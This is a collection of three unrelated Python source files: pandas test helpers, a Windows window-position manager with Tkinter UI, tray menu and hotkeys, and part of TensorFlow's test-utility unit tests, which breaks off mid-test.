raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
if clear is not None:
# make sure that we are clearing these warnings
# if they have happened before
# to guarantee that we will catch them
if not is_list_like(clear):
clear = [clear]
for m in clear:
try:
m.__warningregistry__.clear()
except AttributeError:
# module may not have __warningregistry__
pass
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
|
WinPosManager.py
|
#!/usr/bin/python
# -*- coding: utf8 -*-
import win32gui
import win32con
import win32api
from io import StringIO
import datetime
import os, sys
import tkinter as tk
import threading
import SysRegEdit
import SysRunAdmin
import WinPosCore as wp
import SysTrayIcon as tray
import system_hotkey
# constant value
MIN_WIDTH = 200
MIN_HEIGHT = 200
class WinPosManager(wp.WinData):
root: tk.Tk
popup: tk.Tk
wg_str_profile_name: tk.StringVar
m_width: int
m_height: int
m_margin_x: int
m_margin_y: int
m_win: int
# log message
wg_log_msg: tk.Text
def __init__(self):
wp.WinData.__init__(self)
self.root = tk.Tk()
self.popup = None
self.wg_str_profile_name = tk.StringVar()
self.removed = False
self.is_ui_load = False
self.is_ui_show = False
self.wg_log_msg = tk.Text()
self.m_width = MIN_WIDTH
self.m_height = MIN_HEIGHT
self.m_margin_x = 100
self.m_margin_y = 100
self.pos_mouse = (0, 0)
# minimize to python console window
def init_window(self):
self.m_win = win32gui.FindWindow(None, "WinPosManager")
#win32gui.ShowWindow(self.m_win, win32con.SW_MINIMIZE)
win32gui.ShowWindow(self.m_win, win32con.SW_HIDE)
def get_root(self):
if self.root == 0:
self.root = tk.Tk()
return self.root
def destroy(self):
if self.root == 0: return
if self.removed is False:
self.ui_show_toggle()
return
self.config_save()
self.root.destroy()
self.root = 0
def config_load(self):
conf = self.init2()
self.wg_str_profile_name.set(self.profile_name)
if conf and conf.get('manager'):
pos = conf['manager']['pos']
self.m_width = pos['w']
if self.m_width <= MIN_WIDTH:
self.m_width = MIN_WIDTH
self.m_height = pos['h']
if self.m_height <= MIN_HEIGHT:
self.m_height = MIN_HEIGHT
self.m_margin_x = pos['margin_x']
self.m_margin_y = pos['margin_y']
def config_save(self):
# check change config
if self.change_config is False: return
conf = {'pos': {
'w': self.m_width,
'h': self.m_height,
'margin_x': self.m_margin_x,
'margin_y': self.m_margin_y,
}}
self.save_config(p_conf=conf)
def ui_load(self):
root = self.get_root()
root.title("WinPosManager_UI")
self.ui_calc_geometry()
tk.Label(root, text="Windows Position Manager").pack()
tk.Button(root, text="Save", width=20, command=lambda: button_pressed(self, 'save')).pack()
tk.Button(root, text="Load", width=20, command=lambda: button_pressed(self, 'load')).pack()
tk.Button(root, text="Show", width=20, command=lambda: button_pressed(self, 'show')).pack()
tk.Button(root, text="Exit", width=20, command=lambda: self.destroy()).pack()
root.protocol("WM_DELETE", self.destroy)
return root
def ui_on_move(self, event):
root = self.get_root()
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
now_width = root.winfo_width()
now_height = root.winfo_height()
now_x = root.winfo_x()
now_y = root.winfo_y()
now_margin_x = screen_width - now_width - now_x
now_margin_y = screen_height - now_height - now_y
if self.m_margin_x != now_margin_x:
self.m_margin_x = now_margin_x
self.change_config = True
if self.m_margin_y != now_margin_y:
self.m_margin_y = now_margin_y
self.change_config = True
if self.m_width != now_width:
self.m_width = now_width
self.change_config = True
if self.m_height != now_height:
self.m_height = now_height
self.change_config = True
#print("UI Move or resize event - changed: ", self.change_config)
def ui_calc_geometry(self, x=0, y=0):
screen_width = self.root.winfo_screenwidth()
screen_height = self.root.winfo_screenheight()
my_x = screen_width - self.m_width - self.m_margin_x
my_y = screen_height - self.m_height - self.m_margin_y
if x > 0 and x + self.m_width <= screen_width:
print("set x:", x)
my_x = x
if y > 0 and y + self.m_height <= screen_height:
print("set y:", y)
my_y = y
if my_x < 0:
print("reset x:", my_x)
my_x = 0
if my_y < 0:
print("reset y:", my_y)
my_y = 0
print("X:Y(%d:%d) - width x height: (%dx%d) scr(%dx%d)" % (my_x, my_y, self.m_width, self.m_height, screen_width, screen_height))
self.root.geometry("%dx%d+%d+%d" % (self.m_width, self.m_height, my_x, my_y))
def ui_show_toggle(self):
if self.is_ui_load is False: return False
if self.is_ui_show:
print("UI withdraw")
self.root.withdraw()
self.is_ui_show = False
else:
print("UI redraw")
self.root.deiconify()
self.root.focus_set()
self.is_ui_show = True
return True
def ui_load2(self):
root = self.get_root()
self.config_load()
root.overrideredirect(True)
root.title("WinPosManager_UI")
root.resizable(False, False)
self.ui_calc_geometry()
if self.ui_show_toggle() is True: return
self.is_ui_load = True
self.is_ui_show = True
def toggle_title():
if root.overrideredirect():
root.overrideredirect(False)
else:
root.overrideredirect(True)
frame0 = tk.Frame(root)
frame0.pack(fill=tk.X)
lbl = tk.Label(frame0, text="Windows Position Manager")
lbl.grid(row=0, column=0, padx=7)
btn0_1 = tk.Button(frame0, text="T", width=1, command=lambda: toggle_title())
btn0_1.grid(row=0, column=1)
btn0_2 = tk.Button(frame0, text="X", width=1, command=lambda: self.destroy())
btn0_2.grid(row=0, column=2)
frame1 = tk.Frame(root)
frame1.pack(fill=tk.X)
lbl1 = tk.Label(frame1, text="Profile: ", width=6)
lbl1.pack(side=tk.LEFT, padx=2, pady=2)
entry1 = tk.Entry(frame1, width=13, textvariable=self.wg_str_profile_name)
entry1.pack(side=tk.LEFT, fill=tk.X, padx=10)
def handle_event(event):
profile_name = win_mgr.wg_str_profile_name.get()
if not profile_name:
win_mgr.wg_str_profile_name.set(win_mgr.profile_name)
return
win_mgr.profile_name = profile_name
entry1.bind("<FocusOut>", handle_event)
frame2 = tk.Frame(root)
frame2.pack(fill=tk.X)
btn2_1 = tk.Button(frame2, text="Save", width=12, command=lambda: button_pressed(self, 'save'))
btn2_1.grid(row=0, column=0, padx=3, pady=3)
btn2_2 = tk.Button(frame2, text="Load", width=12, command=lambda: button_pressed(self, 'load'))
btn2_2.grid(row=0, column=1, padx=3)
frame3 = tk.Frame(root)
frame3.pack(fill=tk.X)
btn3_1 = tk.Button(frame3, text="Show", width=12, command=lambda: button_pressed(self, 'show'))
btn3_1.grid(row=0, column=0, padx=3)
btn3_2 = tk.Button(frame3, text="Close", width=12, command=lambda: self.destroy())
btn3_2.grid(row=0, column=1, padx=3)
frame4 = tk.Frame(root)
frame4.pack(fill=tk.BOTH)
#wg_log_msg = tk.Text(frame4, height=3, state=tk.DISABLED)
self.wg_log_msg.master = frame4
self.wg_log_msg.pack(fill=tk.BOTH)
def ui_on_closing():
print("UI close event")
self.destroy()
root.protocol("WM_DELETE_WINDOW", ui_on_closing)
root.bind('<B1-Motion>', lambda ev: self.ui_on_move(ev))
root.bind('<Configure>', lambda ev: self.ui_on_move(ev))
root.bind("<Escape>", lambda ev: self.ui_show_toggle())
root.focus_set()
return root
def popupmsg(self, msg):
if self.popup is not None:
self.popup.destroy()
self.popup = None
self.popup = tk.Tk()
self.popup.title('wininfo')
root = self.get_root()
width=400
height=300
x = self.popup.winfo_screenwidth() - width
y = root.winfo_y() - height
self.popup.geometry("%dx%d+%d+%d" % (width, height, x, y))
text_msg = tk.Text(self.popup, height=70)
text_msg.pack(fill=tk.BOTH)
text_msg.insert(1.0, msg)
text_msg.config(state=tk.DISABLED)
#self.popup.bind("<Key>", lambda ev: self.popup.withdraw())
self.popup.bind("<Escape>", lambda ev: self.popup.withdraw())
self.popup.focus_set()
def set_log_message(self, add_time, msg, cmd='insert'):
if cmd == 'insert':
now = datetime.datetime.now()
log_msg = ''
if len(self.wg_log_msg.get(0.0, tk.END)) > 1:
log_msg = "\n"
if add_time:
#log_msg += now.strftime("%Y%m%d %H:%M ")
log_msg += now.strftime("%H:%M:%S ")
log_msg += msg
self.wg_log_msg.config(state=tk.NORMAL)
self.wg_log_msg.insert(tk.END, log_msg)
self.wg_log_msg.see(tk.END)
self.wg_log_msg.config(state=tk.DISABLED)
elif cmd == 'clear':
self.wg_log_msg.config(state=tk.NORMAL)
self.wg_log_msg.delete(1.0, tk.END)
self.wg_log_msg.config(state=tk.DISABLED)
def button_pressed(mgr: WinPosManager, cmd):
stdout = sys.stdout
if mgr.is_ui_show:
profile_name = mgr.wg_str_profile_name.get()
else:
profile_name = mgr.profile_name
if not profile_name:
profile_name = "data"
mgr.profile_name = profile_name
print("profile: %s" % profile_name)
if mgr.is_ui_show:
mgr.set_log_message(True, "%s %s" % (cmd, profile_name))
if cmd == "show":
sys.stdout = buffer = StringIO()
wp.winpos_main(mgr, cmd)
if cmd == "show":
sys.stdout = stdout
mgr.popupmsg(buffer.getvalue())
if mgr.is_ui_show and cmd == "save":
mgr.set_log_message(False, "cnt: %03d, cntExclude: %03d" % (mgr.cnt, mgr.cntExclude))
if mgr.is_ui_show and len(mgr.logging_message) > 0:
mgr.set_log_message(False, mgr.logging_message)
mgr.logging_message = ''
def ui_show(sys_tray, forced):
if forced: # forced reload WinPosCore
win_mgr.init_done = False
root = win_mgr.ui_load2()
if win_mgr.pos_mouse[0] == 0:
win_mgr.pos_mouse = win32gui.GetCursorPos()
win_mgr.ui_calc_geometry(win_mgr.pos_mouse[0])
if root:
root.mainloop()
listPos = 10*[None]
def init_list_position():
global listPos
# get screen info
monitor_info = win32api.GetMonitorInfo(win32api.MonitorFromPoint(win32api.GetCursorPos()))
work_area = monitor_info.get("Work")
w_half_1 = int(work_area[2] / 2)
h_half_1 = int(work_area[3] / 2)
margin_w = 15 # 화면상에 비는 영역이 발생하여 넓이 보정치
margin_h = 20
'''
screen = win_mgr.get_window_screen()
w_half_1 = int(screen[0] /2)
h_half_1 = int(screen[1] /2)
'''
listPos[0] = 5* [None]
listPos[0][0] = wp.Rect().set([0 , 0 , int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][1] = wp.Rect().set([w_half_1 , 0 , int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][2] = wp.Rect().set([0 , h_half_1, int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][3] = wp.Rect().set([w_half_1 , h_half_1, int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[0][4] = wp.Rect().set([int(w_half_1 /2), int(h_half_1 /2), int(w_half_1)+margin_w, h_half_1+margin_h])
listPos[1] = 3* [None]
listPos[1][0] = wp.Rect().set([0 , h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[1][1] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[1][2] = wp.Rect().set([0 , h_half_1, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[2] = 3* [None]
listPos[2][0] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 /2), h_half_1])
listPos[2][1] = wp.Rect().set([int(w_half_1 ), h_half_1, int(w_half_1 /2), h_half_1])
listPos[2][2] = wp.Rect().set([int(w_half_1 /2), h_half_1, int(w_half_1 ), h_half_1])
listPos[3] = 3* [None]
listPos[3][0] = wp.Rect().set([w_half_1 -margin_w , h_half_1, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[3][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), h_half_1, int(w_half_1 /2) , h_half_1+margin_h])
listPos[3][2] = wp.Rect().set([w_half_1 -margin_w , h_half_1, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[4] = 3* [None]
listPos[4][0] = wp.Rect().set([0 , 0, int(w_half_1 /2), h_half_1*2])
listPos[4][1] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2), h_half_1*2])
listPos[4][2] = wp.Rect().set([0 , 0, int(w_half_1 ), h_half_1*2])
listPos[6] = 3* [None]
listPos[6][0] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 /2)+margin_w, h_half_1*2])
listPos[6][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), 0, int(w_half_1 /2) , h_half_1*2])
listPos[6][2] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 )+margin_w, h_half_1*2])
listPos[7] = 3* [None]
listPos[7][0] = wp.Rect().set([0 , 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[7][1] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[7][2] = wp.Rect().set([0 , 0, int(w_half_1 )+margin_w, h_half_1+margin_h])
listPos[8] = 3* [None]
listPos[8][0] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 /2), h_half_1])
listPos[8][1] = wp.Rect().set([int(w_half_1 ), 0, int(w_half_1 /2), h_half_1])
listPos[8][2] = wp.Rect().set([int(w_half_1 /2), 0, int(w_half_1 ), h_half_1])
listPos[9] = 3* [None]
listPos[9][0] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 /2)+margin_w, h_half_1+margin_h])
listPos[9][1] = wp.Rect().set([w_half_1 + int(w_half_1 /2), 0, int(w_half_1 /2) , h_half_1+margin_h])
listPos[9][2] = wp.Rect().set([w_half_1 -margin_w , 0, int(w_half_1 )+margin_w, h_half_1+margin_h])
listMovedWin = []
def ui_resizer(sys_tray, key):
global listMovedWin, listPos
hwnd = win32gui.GetForegroundWindow()
print("current win id: ", hwnd)
str = win32gui.GetWindowText(hwnd)
print("current win name: ", str)
pos = win_mgr.get_window_rect(hwnd)
find_win = None
idx = None
for one in listMovedWin:
if one is None: break
if one['hwnd'] == hwnd:
find_win = one
idx = listMovedWin.index(one)
break
if find_win is not None:
print(find_win)
else:
find_win = dict(
hwnd=hwnd,
title=str,
pos=pos,
key=key, # pressed key number
key_count=0,
)
listMovedWin.append(find_win)
def ui_move_position(idx):
if key == win32con.VK_NUMPAD5: # return original position
listMovedWin.remove(find_win)
return find_win["pos"]
new_pos = wp.Rect()
if find_win["key"] != key:
find_win["key"] = key
find_win["key_count"] = 0
len = listPos[idx].__len__()
if find_win["key_count"] == len: # return original position
listMovedWin.remove(find_win)
new_pos = find_win["pos"]
else:
new_pos = listPos[idx][find_win["key_count"]]
find_win["key_count"] += 1
pass
return new_pos
new_pos = wp.Rect()
if key >= win32con.VK_NUMPAD0 and key <= win32con.VK_NUMPAD9 :
new_pos = ui_move_position(key - win32con.VK_NUMPAD0)
if not new_pos.is_empty():
win32gui.SetWindowPos(hwnd, win32con.HWND_TOP, new_pos.x, new_pos.y, new_pos.w, new_pos.h, win32con.SWP_NOZORDER)
#listMovedWin[idx].update(find_win)
pass
def tray_menu():
import itertools, glob
icons = itertools.cycle(glob.glob('data/*.ico'))
hover_text = "WinPosManager"
menu_options = (
('Show', None, lambda sys_tray: ui_show(sys_tray, False)),
('Save', None, lambda sys_tray: button_pressed(win_mgr, 'save')),
('Load', None, lambda sys_tray: button_pressed(win_mgr, 'load')),
('Clear log', None, lambda sys_tray: win_mgr.set_log_message('', '', cmd='clear')),
('Experiments', None, (
('Reset', None, lambda sys_tray: ui_show(sys_tray, True)),
('Show debug msg.', None, lambda sys_tray: win32gui.ShowWindow(win_mgr.m_win, win32con.SW_SHOW)),
))
)
def get_click(sys_trayicon):
win_mgr.pos_mouse = win32gui.GetCursorPos()
def bye(sys_trayIcon):
print('Bye, Bye.')
#win_mgr.config_save()
win_mgr.removed = True
win_mgr.destroy()
tray.SysTrayIcon(next(icons), hover_text, menu_options, on_quit=bye, default_menu_index=0, on_click=get_click)
if win_mgr:
win_mgr.removed = True
win_mgr.destroy()
def run_as_admin():
if not SysRunAdmin.isUserAdmin():
print("You're not an admin.", os.getpid(), "params: ", sys.argv)
rc = SysRunAdmin.runAsAdmin()
win_mgr = WinPosManager()
win_mgr.config_load()
def enableHotkey():
hk = system_hotkey.SystemHotkey()
try:
hk.register(('super', 'control', 'z'), callback=lambda ev: button_pressed(win_mgr, 'load'))
hk.register(('super', 'control', 'x'), callback=lambda ev: button_pressed(win_mgr, 'save'))
# hk.register(('super', 'control', 'a'), callback=lambda ev: ui_show(ev, False))
hk.register(('super', 'control', 'kp_0'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD0))
hk.register(('super', 'control', 'kp_1'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD1))
hk.register(('super', 'control', 'k'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD2))
hk.register(('super', 'control', 'kp_3'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD3))
hk.register(('super', 'control', 'j'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD4))
hk.register(('super', 'control', 'kp_5'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD5))
hk.register(('super', 'control', 'l'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD6))
hk.register(('super', 'control', 'kp_7'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD7))
hk.register(('super', 'control', 'i'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD8))
hk.register(('super', 'control', 'kp_9'), callback=lambda ev: ui_resizer(ev, win32con.VK_NUMPAD9))
except Exception as e:
print("already run this program: %s" % e)
sys.exit(0)
except system_hotkey.SystemRegisterError as e:
print("key reg. fail: %s" % e)
if __name__ == '__main__':
#sys.exit(0)
# minimize to python console window
win_mgr.init_window()
# change directory
os.chdir(os.path.dirname(__file__))
#run_as_admin()
#SysRegEdit.execute(__file__)
init_list_position()
enableHotkey()
# app = threading.Thread(target=ShowUI)
# app.start()
tray_menu()
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase):
def test_assert_ops_in_graph(self):
with self.test_session():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegexp(AssertionError,
r"^Found unexpected node 'seven"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegexp(AssertionError,
r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
node_def = ops._NodeDef("op_type", "name")
node_def_orig = ops._NodeDef("op_type_orig", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(), original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
def testAllCloseNestedDicts(self):
a = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
with self.assertRaisesRegexp(
TypeError,
r"inputs could not be safely coerced to any supported types"):
self.assertAllClose(a, a)
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
